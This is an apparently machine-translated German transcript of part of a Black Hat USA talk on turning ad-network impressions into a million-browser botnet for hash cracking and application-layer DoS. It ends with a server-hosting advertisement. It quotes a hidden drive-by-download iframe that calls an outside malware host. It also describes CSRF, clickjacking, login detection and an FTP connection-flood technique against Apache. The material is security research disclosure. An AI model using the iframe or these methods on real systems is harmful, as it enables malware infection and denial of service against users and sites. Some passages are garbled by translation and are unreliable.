BLACK HAT USA Konferenz. Botnet von einer Million Browsern. Teil 1

Jeremy Grossman: Ich freue mich, Sie alle begrüßen zu dürfen, und ich möchte sagen, dass wir diese Präsentation für die gesamten 6 Monate vorbereitet haben. Deshalb bemühen wir uns, unsere Erfolge so schnell wie möglich zu teilen. Ich möchte mich bei allen Mitarbeitern von Black Hat für die Einladung bedanken. Wir kommen jedes Jahr wieder hierher. Wir lieben diese Veranstaltung. Danke für den Black Hat! Wir werden versuchen, die heutige Präsentation unterhaltsam zu gestalten, aber zuerst möchten wir uns vorstellen.



Ich bin der Gründer und Manager für die Entwicklung neuer Produkte bei WhiteHat Security in Santa Clara, Kalifornien. Unser Unternehmen beschäftigt rund 300 Mitarbeiter.

Matt ist der Geschäftsführer des Sicherheitsrisikoforschungszentrums. Bei den "Weißköpfigen" beschäftigen wir uns hauptsächlich damit, in Websites einzudringen, Schwachstellen darin zu finden und dies in großem Umfang zu tun. Wir haben jedoch noch etwas Zeit für Recherchen. Daher werden wir heute damit beginnen, Browser zu hacken und sie zum Hacken von Websites und zum Anzeigen des gesamten Zyklus der Websicherheit zu verwenden. Ich habe hier zum ersten Mal im Jahr 2002 gesprochen. Die meiste Zeit forsche ich an der Entwicklung und Präsentation unserer Produkte.

Matt Johansson: Ich habe Erfahrung als Penetrationstester (Pentester) und habe meine Arbeit im Unternehmen durch das Hacken von Websites begonnen, weil ich zuvor selbst die Armee der Hacker geleitet habe. Ich recherchiere cool und nehme viel dafür, damit du mich kontaktieren kannst.



Jeremy Grossman: Also, lass uns unsere Party beginnen. Ich glaube nicht, dass es mindestens eine Person gibt, die heute nicht auf das Internet zugegriffen hat. Vielleicht sind Sie jetzt nicht mit dem Internet verbunden, aber wenn Sie nach Hause kommen, interagieren alle hier Anwesenden und alle, die Sie kennen, über einen Browser damit. Dies ist nur ein Teil unseres täglichen Lebens, und ich werde Ihnen beschreiben, was dies bedeutet, aber das Internet ist in erster Linie darauf ausgelegt, zu funktionieren. Wir hacken das Internet nicht, wir versuchen es für unsere eigenen Zwecke zu nutzen.

Wenn Sie eine Webseite besuchen, spielt es keine Rolle, welchen Browser Sie verwenden - Chrome, Firefox, Safari, IE oder Opera. In jedem Fall funktioniert das Internet so, dass es Ihren Browser vollständig steuert, während Sie sich auf dieser Seite befinden oder wenn Sie nach dem nächsten suchen Seite.

Das JavaScript oder Flash auf dieser Seite kann dazu führen, dass der Browser alles tut - jede Art von Antwort auf Anfragen an eine beliebige Stelle im Internet oder im Intranet. Dies beinhaltet CSRF - gefälschte Cross-Site-Anfragen, XSS - Cross-Site-Scripting, Clickjacking und viele andere Tricks, mit denen Sie die Kontrolle über den Browser erlangen können.

Jetzt werden wir versuchen, ein Verständnis für die Browsersicherheit zu erlangen. Die Hauptidee besteht jedoch darin, sich einen Überblick über die Browsersteuerung zu verschaffen, ohne Zero-Day-Exploits zu verwenden, für die es keine Patches gibt.

Matt Johanson: Wenn Sie nichts über XSS wissen, können Sie uns danach fragen.

Jeremy Grossman: Jetzt möchte ich kurz auf Browser-Angriffe eingehen, die HTML oder bösartiges JavaScript verwenden:

• Browserabfrage Browserabfrage
• gefälschte standortübergreifende Anfragen, Login-Erkennung Login-Erkennung, Dekanonymisierung;
  Das Intranet hacken
  Automatisches Crossite-Scripting
  herkömmliche Malware, die beim Herunterladen mit der Drive-by-Download-Methode auf den Computer des Benutzers gelangt;
  Hash Brute Force Cracking;
  DDoS-Angriffe auf Anwendungsebene.
  
  
  
  
  Auf dieser Folie sehen Sie eine Beispiel-Browserabfrage - es ist nur JavaScript, das im Browser verbleibt, wenn Sie zu einer anderen Site wechseln. Dies ist ein Screenshot von CNN. Wenn Sie ihre Website besuchen, ist die dortige Metrik mit Ihrem Browser verbunden, der eine vollständige Umfrage durchführt und eine ganze Reihe von Informationen über Ihre Anzeige erhält: Welchen Browser haben Sie, welche Version, welche Plugins sind verbunden, welches Betriebssystem haben Sie. Sie tun dies, weil sie wissen möchten, wer ihre Website besucht hat. Heutzutage ist dies eine sehr verbreitete Technologie.
  
  Betrachten Sie als Nächstes eine fortschrittlichere Technologie - die standortübergreifende JavaScript-Fälschung. Es erfordert keinen großen Aufwand, Sie müssen kein schädliches Skript ausführen, nur Ihr Browser mit JavaScript oder HTML wird verwendet, um in eine andere Site zu hacken. CSRF verwendet Ihren Google-Suchverlauf und zwingt Ihren Browser, illegale Inhalte hochzuladen oder herunterzuladen. Wenn Sie sich in Ihr persönliches Konto auf der Website der Bank einloggen, werden Sie gezwungen, missbräuchliche Nachrichten zu senden oder Ed Snowden als Person des Jahres zu wählen.
  
  Matt Johanson: CSRF kann Sie zwingen, nicht nur Justin Biebers Hits herunterzuladen, sondern auch Kinderpornos herunterzuladen.
  
  Jeremy Grossman: Die erste Zeile auf der Folie zwingt Ihren Browser, schädliche Inhalte in jede andere Website einzufügen. Das heißt, Sie können zum Hacker werden. Die zweite Zeile zwingt Sie zum Herunterladen des Torrents und macht Sie zu einem Piraten, der gegen alle Arten von DMCA-Lizenzen verstößt. Die dritte Zeile sendet ihn an den Fanclub Justin Bieber, Vierter - Abstimmung auf einer Website.
  
  
  
  Das Folgende ist die Erkennung des Login Detection Login - dies ist, wenn Sie zu der Site gehen, die wir kontrollieren. Wir können feststellen, dass Sie in Ihrem Konto bei Google, Facebook, Twitter, Linkedin angemeldet sind. Es gibt 6 verschiedene Technologien zum Extrahieren von Autorisierungsdaten aus Ihrem Browser. Wir untersuchen Ihre Vorlieben und führen einen gezielten Angriff auf einen bestimmten Benutzer durch.
  
  
  
  Ein weiterer Angriff ist das Clickjacking. Sie können Ihre Daten anzeigen, sobald Sie auf ein Bild oder eine Schaltfläche klicken. Angenommen, Sie haben sich bei Twitter oder Facebook angemeldet und das Bild einer tanzenden Katze gemocht. Sie klicken auf etwas Harmloses, aber in Wirklichkeit klicken Sie auf eine dieser Schaltflächen und zeigen Ihre Daten an. Nur ein Klick - und wir kennen Ihren Namen, Ihren Standort und die Daten, die Sie in Ihrem Profil auf Twitter oder LinkedIn gepostet haben.
  
  
  
  Matt Johanson: Einige Unternehmen befassen sich mit solchen Nachverfolgungen, da Ihr vollständiger Name für sie für die gezielte Werbung für ihre Waren oder Dienstleistungen von großem Wert sein kann.
  
  Jeremy Grossman: Bisher haben wir bekannte Dinge besprochen, die zumindest dem Black Hat-Publikum bekannt sind. Sie sind sich auch bewusst, dass Sie das Intranet-Intranet beschädigen, indem Sie schädliches JavaScript über HTTP in Ihren DSL-Router einfügen, der Netzwerkkonnektivität bietet.
  
  
  
  Dies wurde erstmals im Jahr 2006 entdeckt und diese Sicherheitsanfälligkeit wurde bisher nicht behoben. Darüber hinaus haben wir die Art des Angriffs "Automatisches Cross-Site-Scripting". Bei Verwendung von iframe wird schädlicher XSS-Code injiziert, mit dem Sie Ihre Cookies, gespeicherten Passwörter usw. stehlen können. Dies erfolgt hauptsächlich über das Portal des E-Mail-Anbieters.
  
  
  
  Schließlich können Sie herkömmliche Malware mithilfe der Drive-by-Downloads-Methode herunterladen, indem Sie die folgende Zeile einfügen:
  
  

  <iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe> 

  
  Infolgedessen wird Ihr Browser an infizierte Websites gesendet, um schädliche Inhalte herunterzuladen, die dann Ihren Computer steuern. Hier kann das Objekt des Angriffs der Browser selbst oder seine Erweiterungen sein. Diese Angriffe werden hauptsächlich zum Erstellen eines Botnetz-Netzwerks verwendet. Um diese Bedrohung zu vermeiden, müssen Sie Patches rechtzeitig installieren. Es ist besser, Java vollständig zu entfernen. Kurz gesagt, dies sind die Angriffsmethoden, auf die wir uns in diesem Vortrag konzentrieren werden.
  
  Matt Johansson: Jeremy hat über Dinge gesprochen, die bereits auf früheren BlackHat-Konferenzen erwähnt wurden. Ich möchte über eine weitere Studie sprechen, die sich auf verteiltes Rechnen mit JavaScript zum Knacken von Passwörtern konzentrierte. Das ist eine coole Sache, weil man sie einfach schreiben kann und sie sehr, sehr schnell funktioniert. Lavakumar Kuppans Forschung legt nahe, dass Sie mit der von ihm erfundenen Metrik tatsächlich hunderttausend MD5-Hashes pro Sekunde mithilfe von JavaScript hacken oder versuchen können, diese zu verteilen, wenn Sie dieses JavaScript verteilen können.
  
  Die folgende Folie zeigt, wie das auf JavaScript basierende verteilte Ravan-Computersystem funktioniert, das mithilfe eines Brute-Force-Angriffs Hashes über mehrere Browser hinweg angreifen kann.
  
  Es verwendet HTML5, um JavaScript im Hintergrund von WebWorkers auszuführen, einschließlich vieler Computer, auf denen ein Browser in einem einzigen Netzwerk zum Erraten von Kennwörtern geöffnet ist. Sie findet das Benutzerkennwort, das einem bestimmten Hash entspricht, und sortiert zwischen 60 und 70.000 Kennwörtern pro Sekunde. Hierfür werden 12 WebWorker verwendet.
  
  
  
  Dies ist eine sehr schnelle Sache, später werden wir uns darauf konzentrieren, wie es verteilt wird. Zusätzlich zu diesem Problem haben wir seit mehreren Monaten ernsthaft nach Anwendungen gesucht, die Service Failure (DoS) verursachen. Der Browser kann mithilfe von COR von WebWorkers eine überraschend große Anzahl von GET-Anforderungen an eine Remote-Site senden. Während der Recherche wurde festgestellt, dass ungefähr 10.000 Anfragen pro Minute von einem einzigen Browser gesendet werden können. Gleichzeitig hält der Browser nicht viele TCP-Verbindungen offen, sondern startet gleichzeitig viele HTTP-Anforderungen. Sie können sowohl einen einzelnen Browser als auch mehrere Browser für eine Site verwenden. Sie können die Intensität des Angriffs jedoch jederzeit erhöhen, indem Sie die Anzahl der Verbindungen erhöhen.
  
  Jeremy Grossman: Ich werde über Browser-Einschränkungen bei Verbindungen sprechen.
  
  
  
  Ein Tool namens Browserscope zeigt an, wie viele Verbindungen ein bestimmter Browser oder eine bestimmte Browserversion gleichzeitig unterstützen kann. Alle Browser unterstützen nicht mehr als 6 Verbindungen mit demselben Hostnamen, und die maximale Anzahl von Verbindungen, beispielsweise in den IE-Versionen 8 und 9, erreicht 35. Jeder Browser hat eine Begrenzung der Anzahl von Verbindungen, nicht aus Sicherheitsgründen, sondern aus Gründen der Stabilität und Leistung, da Sie zur Site gehen Wenn Sie eine Anfrage senden, lädt Ihr Browser Inhalte herunter.
  
  Wir haben diese Indikatoren überprüft und können sagen, dass die meisten Browser wirklich mit 6 arbeiten, mit maximal 7 Verbindungen. Die folgende Folie zeigt den Betrieb von Browserscope, das die Leistung verschiedener Browser testet und viele gleichzeitige Verbindungen zum Server herstellt. In diesem Fall gab es sechs stabile Verbindungen für Firefox.
  
  In einigen Browsern können Sie diese Einschränkung jedoch umgehen. In unseren Tests haben wir Firefox verwendet, um einen Dienstfehler zu verursachen. Die nächste Folie zeigt das Apache Killer-Skript, mit dessen Hilfe die Browser-Einschränkung umgangen, ein ganzer Strom gleichzeitiger Anforderungen an den Server erstellt und die Anzahl gleichzeitig geöffneter Verbindungen von 6 auf 300 erhöht wurde.
  
  
  
  Das HTTP-Protokoll wurde hier verwendet, aber wenn Sie FTP über Port 80 verwenden, erhöht sich die Anzahl der Verbindungen auf 400, und dies kann den Apache-Server wirklich "töten".
  
  Matt Johanson: Der wichtige Unterschied besteht darin, dass wir dies über FTP gemacht haben, das das HTTP-Protokoll nicht verwenden kann. Daher konnten wir nicht viele Positionen am Anfang der Liste überprüfen und nicht viele CSR-Anwendungen ausführen. Dies sind nur Verbindungen, die wir gleichzeitig öffnen wollten. Dies ist also kein sehr traditioneller DoS-Angriff. Wenn ein Angreifer versucht, so viele Megabits oder Gigabits pro Sekunde oder Stunde wie möglich zu starten, ist dies nur die zulässige Anzahl offener Verbindungen gleichzeitig.
  
  Jeremy Grossman: Jetzt werde ich den Apache-Server auf meinem Laptop ausführen. Dies ist eine einfache Vanille-Version von Apache 2.4.4, in der alle Grundeinstellungen standardmäßig festgelegt sind und keine wesentlichen Auswirkungen haben können.
  
  
  
  Wir werden uns auf den ersten Zyklus konzentrieren. Ich werde hier eine ganze Reihe von Bildanforderungen auf dem Server installieren. Sie sehen, wie die Anforderungen gesendet werden, und der Server antwortet 3 Sekunden lang nicht. Anschließend werden die Bilder in Reihe geladen.
  
  Matt Johanson: Dies ist ein Aspekt der Browserleistung, kein Aspekt der Sicherheit. Wir können es möglicherweise zum Nachteil der Sicherheit missbrauchen. Sie werden es in wenigen Minuten sehen. Der Zweck dieser Aktion besteht jedoch darin, alle diese Bilder gleichzeitig herunterzuladen.
  
  Jeremy Grossman: Ich habe vergessen, den Status des Servers zu erwähnen. Auf dem Bildschirm unten links sehen Sie, dass der Status 7 gleichzeitig geöffnete Verbindungen anzeigt, eine für das Browserfenster und die andere 6 für 6 hochgeladene Bilder. Dies ist sehr wichtig, da wir jetzt versuchen, den oberen Rand der Verbindungen in diesem bestimmten Browser zu durchbrechen. Jetzt werde ich den Verbindungswert auf 0 setzen, um diese Verbindungen zu beenden, und eine Möglichkeit zeigen, Einschränkungen in Firefox zu umgehen.
  
  Wir schleifen diese bis zu 100 Verbindungen einfach über FTP für denselben Hostnamen. Sie alle benötigen keine URL, da es sich um FTP handelt und kein HTTP gesendet wird. Schauen Sie in die untere linke Ecke - der Serverstatus hat sich geändert, es werden 100 Verbindungen und 100 Seiten zum Anzeigen angezeigt. Gehen wir nun zu 400 Verbindungen über.
  
  Die Seite wird jede Sekunde aktualisiert, und wenn die Anzahl der Verbindungen 270 erreicht, leidet der Server unter einer „Panik“, dass er keine Zeit hat, weitere Anforderungen zu bearbeiten. Alles, was wir tun, ist, diesen Code auf eine Webseite hochzuladen, und Apache versucht, die Anzahl der gleichzeitig geöffneten Verbindungen auf 300 zu erhöhen. Und das alles mit einem einzigen Browser.
  
  Auf der Rückseite des Hintergrunds sehen Sie ein weiteres Scrollen. Wir haben ein anderes System bei Amazon. Dies ist das AWS-System. Ich möchte sie jetzt nicht mit einem DoS-Angriff töten, deshalb habe ich Ihnen eine weitere Demonstrationsoption angeboten.
  Matt Johansson: Jetzt wissen wir, was wir tun können, zumindest mit Firefox. Dies ist kein traditioneller Denial-of-Service-Angriff, und das Botnetz wird hier nicht verwendet. Wir haben noch einige weitere Möglichkeiten, aber im Allgemeinen sind die Vorteile des Hackens mit dieser Angriffsmethode wie folgt:
  
  
  • Es sind keine Malware, keine Exploits oder Zero-Day-Angriffe erforderlich.
  • keine Spuren, keine Angst, Verbot des Browser-Caching;
  • Standardmäßig ist jeder Browser für diesen Angriff anfällig.
  • Sie haben selbst gesehen, wie einfach der Code aussieht.
  • wie wir sagen - es funktioniert so, wie es funktionieren sollte. Das Internet ist möglicherweise so konzipiert, dass es auf diese Weise funktioniert, dh es muss sicherstellen, dass mehrere Bilder so schnell wie möglich heruntergeladen werden.
  
  Daher weiß ich nicht, wer dieses Problem beheben kann. Konzentrieren wir uns auf das Problem der Verbreitung dieser Angriffsmethode mit schädlichem JavaScript-Code. Wir werden die klassischen Verwendungsmöglichkeiten von Spammern wie das Versenden von E-Mails nicht berücksichtigen. Betrachten Sie die Verteilung durch einen regulären Benutzer, d. H. Die Skalierung aus der Sicht eines regulären Benutzers:
  
  
  • Nutzung von Websites mit erheblichem Datenverkehr (Blog, Software usw.);
  • HTML-Injektionen in beliebte Websites, Foren usw.
  • die "Mann in der Mitte" -Methode über einen WLAN-Router;
  • "Vergiftung" von Suchmaschinen;
  • Hacken von Sites durch Masseninjektion von SQL-Würmern;
  • Widgets von Drittanbietern (Wetter, Zähler, Tracker usw.).
  
  Douglas Crockford sagte: "Der zuverlässigste und kostengünstigste Weg, schädlichen Code einzufügen, ist der Kauf von Anzeigen." Daher werden wir uns überlegen, wie Werbenetzwerke funktionieren, da es im Internet viele davon gibt. Die nächste Folie zeigt ein eigenartiges Werbe-Ökosystem.
  
  
  
  Oben sehen Sie also, dass Werbetreibende Ihnen zunächst etwas zeigen sollten, beispielsweise einen Blumenstrauß für ein Date. Sie geben Geld dafür aus, aber sie brauchen Standorte, um ihre Waren zum Endverbraucher zu bringen. Sie möchten Massenhändler in ihren Händen halten - Herausgeber von Informationen wie Blogs, Nachrichten, sozialen Netzwerken, Rezensionen und beliebten Websites, die von vielen Benutzern besucht werden. Es gibt eine Brücke zwischen Werbetreibenden und Publishern, die als Werbenetzwerke bezeichnet wird. Sie geben Geld aus, um ihre Informationen in diesen Netzwerken zu veröffentlichen. Es können Bilder, Popup-Banner, JavaScript sein - alles, was Sie sehen möchten. Sie sind die kleinen blauen Figuren am unteren Rand der Folie.
  
  Matt Johansson: Heute Morgen sind wir auf die TMZ-Website gegangen und haben dort diesen erstaunlichen Screenshot gemacht.
  
  
  
  Sie sehen den Anzeigenblock ganz oben auf der Seite und unten rechts.
  
  Jeremy Grossman: Alle Anzeigenblöcke, die Sie sehen, sind JavaScript-Code, der sich direkt vor den Nutzern der TMZ-Website befindet und dazu dient, ihre Aufmerksamkeit zu erregen, um etwas Geld zu verdienen. Es gibt Dutzende solcher Werbenetzwerke, aber denken Sie daran, dass das Bild unseres Firmenlogos in der oberen rechten Ecke der Folie kein Werbenetzwerk ist! Einige dieser Netzwerke verwenden JavaScript, andere nicht.
  
  Also schrieb ich den Eigentümern eines Werbenetzwerks einen Brief darüber, was ich für JavaScript von Drittanbietern in ihrem System platzieren möchte. Einer der Jungs antwortete mir sehr schnell, buchstäblich in ein paar Minuten. Er schrieb, dass sie nur zulassen, dass solcher Code von großen und bekannten Unternehmen wie DoubleClick veröffentlicht wird, denen sie vertrauen und die alle Materialien auf ihrer Seite nach potenziellen Schwachstellen durchsuchen. Und wenn ich mit so großen Ad-Servern von Drittanbietern wie DFA und dergleichen arbeite, finden sie die Möglichkeit, mein JavaScript zu hosten.
  
  
  
  Alle traditionellen Werbenetzwerke verhalten sich so - Sie zahlen ihnen Geld, erhalten einige Kennzahlen und sie schalten Ihre Anzeige. Es gibt eine andere Art von Netzwerk, auf die wir gestoßen sind. Wir geben Ihnen absichtlich nicht ihre Namen, weil wir nicht wissen, ob wir dadurch in Schwierigkeiten geraten werden.
  
  
  
  Diese Systeme funktionieren auf diese Weise: Sie zahlen ein wenig Geld für jemanden, der abends zu Hause vor dem Computer sitzt, um Ihre Seite für eine bestimmte Zeit über seinen Browser anzuzeigen. Es stellt sich heraus, dass Sie Browserzeit für einen Cent kaufen - in diesem Fall können 10 Tausend Minuten Anzeige für etwa 10,5 US-Dollar gekauft werden.
  
  Matt Johansson: Ein wichtiger Umstand ist, dass diese Methode der bezahlten Ansichten häufig zum Knacken eines Passworts verwendet wird. Da ein Angreifer viel Zeit benötigt, um ein Kennwort zu knacken oder sich mit der Brute-Force-Methode anzumelden, garantieren diese Werbenetzwerke nicht, dass Ihr Browser Anzeigen anzeigt, aber keinen schädlichen Code abfängt, der ausgeführt wird, sobald die Werbung auf die Seite geladen wird. Sie zahlen dafür, aber wenn eine Person eine Minute, 10 Minuten, 2 Sekunden dort sitzt, gibt es keine Garantie dafür, dass Sie nicht dafür bezahlen, dass Sie für einen DoS-Angriff verwendet werden können.
  
  Jeremy Grossman: Achten Sie auf die letzte Zeile - Sie können eine Million Minuten Anzeige kaufen, dies sind fast 2 Jahre Browserzeit für etwa 650 US-Dollar. Das ist also eine gute Metrik!
  
  Jetzt arbeitet das Internet an Werbung und es ist einen Cent wert. Kehren wir zur Agenda zurück und konzentrieren uns auf die letzten beiden Arten von Angriffen - Brute-Force-Hash-Cracking und DDoS-Angriffe auf Anwendungsebene. Sie sehen, dass sie vom Browser leicht auf eine Million skaliert werden können, oder zahlen einfach 650 US-Dollar und hacken das Passwort für eine Zeit, die zwei Jahren entspricht. Wir werden Ihnen einige Demonstrationen zeigen, aber lassen Sie uns zunächst über Wirtschaft sprechen.
  
  Matt Johansson: Sie haben diesen Screenshot vom Kauf von Minuten gesehen, aber die Werbenetzwerke haben ihre eigene Sprache, was für mich nicht leicht zu lernen war. Werbetreibende nennen dies "Impressionen", aber wir sprechen auf bestimmten Seiten über bezahlte Werbedienstleistungen. In den letzten Monaten lag der Preis bei rund 50 Cent pro 1.000 "Impressionen" oder pro tausend Anzeigenimpressionen. Es gibt CPC- und Cost of Thousand CPM-Preisschilder.
  
  
  
  Wenn ich also "Impression" sage, sollten Sie sich den Browser als Bot vorstellen, als hätten Sie eine Person eingestellt, um Ihre Anzeigen in den Browser hochzuladen und im Moment die Kontrolle über diesen Browser zu erlangen. Also nennen sie es "Eindruck" und wir nennen es "Bot".
  
  Jeremy Grossman: Es gibt keine Hindernisse, die verhindern, dass Bösewichte, echte Bösewichte, die Kreditkarten stehlen, diese gestohlenen Karten verwenden können, um Werbeminuten oder „Impressionen“ zu kaufen.
  
  Matt Johanson: Im folgenden Screenshot sehen Sie die Statistiken des Werbenetzwerks, die wir für unsere Recherchen verwendet haben.
  
  
  
  Wir fühlten uns wie vor dem Dashboard, klickten auf Schaltflächen und versuchten, unsere Anzeigen in diesem Netzwerk zu schalten. Wir haben keine Anzeigen geschaltet, nur Dummies, und unseren JavaScript-Code nicht ausgeführt. Wir haben uns nur als Werbetreibende versucht und versucht, für den Nutzer und die Eigentümer des Werbenetzwerks so unauffällig wie möglich zu bleiben, damit wir nur unsere friedlichen Hacking-Methoden anwenden und unsere eigenen Webserver steuern können. In den wenigen Monaten unserer Forschung haben wir nicht einmal 10 Dollar ausgegeben.
  
  Sie können tägliche Limits für alle Arten von Werbeartikeln festlegen, bestimmte Keywords auswählen, auf die sich Benutzer konzentrieren sollen, die geografische Position der Zielgruppe, Betriebssysteme oder Browser auswählen, die in Ihrer Anzeige angezeigt werden sollen, und Anzeigen auf die mobilen oder stationären Geräte der Benutzer konzentrieren.
  
  Ich habe nur die größtmögliche Reichweite des Publikums gewählt und das Wort "Computer" als Schlüsselwort gewählt. Am ersten Tag kauften wir nur 15 Klicks, es kostete uns 4 US-Dollar, als Ergebnis erhielten wir 8326 "Impressionen". Stellen Sie sich vor, mit einer so rentablen Investition könnte Ihr Code innerhalb von 24 Stunden in 8326 Browser heruntergeladen werden!
  
  BLACK HAT USA Konferenz. Botnet von einer Million Browsern. Teil 2
  
  
  Vielen Dank für Ihren Aufenthalt bei uns. Gefällt dir unser Artikel? Möchten Sie weitere interessante Materialien sehen? Unterstützen Sie uns, indem Sie eine Bestellung aufgeben oder Ihren Freunden empfehlen, einen Rabatt von 30% für Habr-Benutzer auf ein einzigartiges Analogon von Einstiegsservern, das wir für Sie erfunden haben: Die ganze Wahrheit über VPS (KVM) E5-2650 v4 (6 Kerne) 10 GB DDR4 240 GB SSD 1 Gbit / s von $ 20 oder wie teilt man den Server? (Optionen sind mit RAID1 und RAID10, bis zu 24 Kernen und bis zu 40 GB DDR4 verfügbar).
  
  VPS (KVM) E5-2650 v4 (6 Kerne) 10 GB DDR4 240 GB SSD 1 Gbit / s bis Dezember kostenlos, wenn Sie für einen Zeitraum von sechs Monaten bezahlen, können Sie hier bestellen.
  
  Dell R730xd 2 mal günstiger? Nur wir haben 2 x Intel Dodeca-Core Xeon E5-2650v4 128 GB DDR4 6 x 480 GB SSD 1 Gbit / s 100 TV von 249 US-Dollar in den Niederlanden und den USA! Lesen Sie mehr über den Aufbau eines Infrastrukturgebäudes. Klasse mit Dell R730xd E5-2650 v4 Servern für 9.000 Euro für einen Cent?